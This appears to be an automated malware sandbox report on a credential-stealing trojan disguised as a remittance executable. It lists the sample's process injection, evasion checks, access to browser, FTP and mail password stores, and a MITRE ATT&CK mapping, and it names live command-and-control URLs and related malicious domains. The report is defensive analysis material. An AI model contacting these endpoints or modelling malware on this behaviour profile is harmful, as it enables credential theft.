            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeAPI/Special instruction interceptor: Address: D33244
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe TID: 7148Thread sleep time: -720000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0079445A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079C6D1 FindFirstFileW,FindClose,0_2_0079C6D1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0079C75C
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079EF95
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F0F2
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079F3F3
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007937EF
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793B12
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079BCBC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007349A0
            Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
            Source: svchost.exe, 00000002.00000002.3286587485.0000000003200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx?
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeAPI call chain: ExitProcess graph end nodegraph_0-101239
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeAPI call chain: ExitProcess graph end nodegraph_0-101458
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A3F09 BlockInput,0_2_007A3F09
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733B3A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00765A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00765A7C
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00734B37 LoadLibraryA,GetProcAddress,0_2_00734B37
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00D334B0 mov eax, dword ptr fs:[00000030h]0_2_00D334B0
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00D33510 mov eax, dword ptr fs:[00000030h]0_2_00D33510
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00D31E70 mov eax, dword ptr fs:[00000030h]0_2_00D31E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14410 mov eax, dword ptr fs:[00000030h]2_2_00B14410
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14410 mov eax, dword ptr fs:[00000030h]2_2_00B14410
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13060 mov eax, dword ptr fs:[00000030h]2_2_00B13060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13060 mov eax, dword ptr fs:[00000030h]2_2_00B13060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13060 mov eax, dword ptr fs:[00000030h]2_2_00B13060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13060 mov eax, dword ptr fs:[00000030h]2_2_00B13060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13540 mov eax, dword ptr fs:[00000030h]2_2_00B13540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13540 mov eax, dword ptr fs:[00000030h]2_2_00B13540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13540 mov eax, dword ptr fs:[00000030h]2_2_00B13540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B156A0 mov eax, dword ptr fs:[00000030h]2_2_00B156A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B156A0 mov ecx, dword ptr fs:[00000030h]2_2_00B156A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14610 mov eax, dword ptr fs:[00000030h]2_2_00B14610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14610 mov eax, dword ptr fs:[00000030h]2_2_00B14610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14610 mov eax, dword ptr fs:[00000030h]2_2_00B14610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B14610 mov eax, dword ptr fs:[00000030h]2_2_00B14610
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_007880A9
            Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0075A155
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075A124 SetUnhandledExceptionFilter,0_2_0075A124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B15848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B15848
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B133C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,2_2_00B133C0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.1 80Jump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F07008Jump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007887B1 LogonUserW,0_2_007887B1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733B3A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007348D7
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00794C7F mouse_event,0_2_00794C7F
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Remittance_CT022024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00787CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00787CAF
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0078874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0078874B
            Source: Remittance_CT022024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Remittance_CT022024.exeBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075862B cpuid 0_2_0075862B
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00764E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00764E87
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00771E06 GetUserNameW,0_2_00771E06
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00763F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00763F3A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007349A0
            Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Remittance_CT022024.exe PID: 5780, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1440, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000002.00000002.3286611014.0000000003227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: PopPassword2_2_0040D069
            Source: C:\Windows\SysWOW64\svchost.exeCode function: SmtpPassword2_2_0040D069
            Source: Remittance_CT022024.exeBinary or memory string: WIN_81
            Source: Remittance_CT022024.exeBinary or memory string: WIN_XP
            Source: Remittance_CT022024.exeBinary or memory string: WIN_XPe
            Source: Remittance_CT022024.exeBinary or memory string: WIN_VISTA
            Source: Remittance_CT022024.exeBinary or memory string: WIN_7
            Source: Remittance_CT022024.exeBinary or memory string: WIN_8
            Source: Remittance_CT022024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007A6283
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007A6747
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B16AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_00B16AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B16BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_00B16BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B16B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_00B16B60
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Service Execution
            2
            Valid Accounts
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol2
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt3
            Windows Service
            2
            Valid Accounts
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            1
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Access Token Manipulation
            1
            DLL Side-Loading
            NTDS117
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
            Windows Service
            1
            Masquerading
            LSA Secrets131
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials11
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Virtualization/Sandbox Evasion
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Remittance_CT022024.exe32%ReversingLabsWin32.Trojan.AutoitInject
            Remittance_CT022024.exe31%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://touxzw.ir/fix/five/fre.php100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            touxzw.ir
            104.21.48.1
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phpfalse
                high
                http://alphastand.win/alien/fre.phpfalse
                  high
                  http://alphastand.trade/alien/fre.phpfalse
                    high
                    http://alphastand.top/alien/fre.phpfalse
                      high
                      http://touxzw.ir/fix/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.ibsensoftware.com/svchost.exe, svchost.exe, 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.21.48.1
                        touxzw.irUnited States
                        13335CLOUDFLARENETUSfalse
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1620063
                        Start date and time:2025-02-20 16:15:21 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Remittance_CT022024.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/6@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 60
                        • Number of non-executed functions: 275
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        10:16:18API Interceptor126x Sleep call for process: svchost.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.21.48.1http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/Get hashmaliciousHTMLPhisherBrowse
                        • microsoft-sharepoint4543464633.pages.dev/index-2jc93/
                        install.exeGet hashmaliciousBabadedaBrowse
                        • api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
                        ZmK1CAc4VP.exeGet hashmaliciousFormBookBrowse
                        • www.tumbetgirislinki.fit/4wrd/
                        uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                        • www.lucynoel6465.shop/jgkl/
                        QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                        • www.lucynoel6465.shop/am6a/
                        LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                        • www.tumbetgirislinki.fit/k566/
                        laserl.ps1Get hashmaliciousFormBookBrowse
                        • www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
                        laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                        • www.tumbetgirislinki.fit/k566/
                        DHL parcel.exeGet hashmaliciousFormBookBrowse
                        • www.kdrqcyusevx.info/q64t/
                        BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                        • www.newanthoperso.shop/y5uj/
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        touxzw.irdfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                        • 104.21.80.1
                        Request for quotation -6001845515-XLSX.exeGet hashmaliciousLokibotBrowse
                        • 104.21.64.1
                        vsf098633534.exeGet hashmaliciousLokibotBrowse
                        • 104.21.64.1
                        scan_0219025_pdf.exeGet hashmaliciousLokibotBrowse
                        • 104.21.112.1
                        scan_07022025_pdf.exeGet hashmaliciousDarkTortilla, LokibotBrowse
                        • 104.21.112.1
                        specs_916351_xlsx.exeGet hashmaliciousLokibotBrowse
                        • 104.21.48.1
                        specs_00235_xlsx.exeGet hashmaliciousLokibotBrowse
                        • 104.21.32.1
                        specs_12788_xls.exeGet hashmaliciousLokibotBrowse
                        • 104.21.48.1
                        LEmJJ87mUQ.exeGet hashmaliciousLokibotBrowse
                        • 172.67.134.88
                        lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                        • 188.114.97.3
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSnew.batGet hashmaliciousUnknownBrowse
                        • 104.16.230.132
                        https://lj.anaderpiu.ru/Kkj54Bn/Get hashmaliciousUnknownBrowse
                        • 104.16.2.189
                        #Ud835#Udc7a#Ud835#Udc86#Ud835#Udc95#Ud835#Udc96#Ud835#Udc91.exeGet hashmaliciousLummaC StealerBrowse
                        • 172.67.136.89
                        #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7-#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousLummaC StealerBrowse
                        • 172.67.136.89
                        #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.26.3.16
                        FW+Billy+Ferguson+shared+Alpha+Projects+Principal+Contractor+#22344.pdf+with+you.emlGet hashmaliciousUnknownBrowse
                        • 104.18.10.14
